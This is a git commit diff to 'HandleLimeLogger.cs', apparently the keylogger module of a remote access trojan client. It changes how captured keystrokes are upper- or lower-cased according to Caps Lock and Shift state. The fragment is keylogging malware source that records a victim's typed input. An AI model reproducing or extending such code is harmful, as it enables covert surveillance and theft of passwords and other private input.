Update HandleLimeLogger.cs

This commit is contained in:
NYAN CAT 2019-06-15 20:42:47 +03:00
parent 80d16157b5
commit 0aeb230ee9

View File

@ -62,11 +62,11 @@ namespace Client.Handle_Packet
if (capsLock || shiftPress) if (capsLock || shiftPress)
{ {
currentKey = KeyboardLayout((uint)vkCode).ToUpper(); currentKey = currentKey.ToUpper();
} }
else else
{ {
currentKey = KeyboardLayout((uint)vkCode).ToLower(); currentKey = currentKey.ToLower();
} }
if ((Keys)vkCode >= Keys.F1 && (Keys)vkCode <= Keys.F24) if ((Keys)vkCode >= Keys.F1 && (Keys)vkCode <= Keys.F24)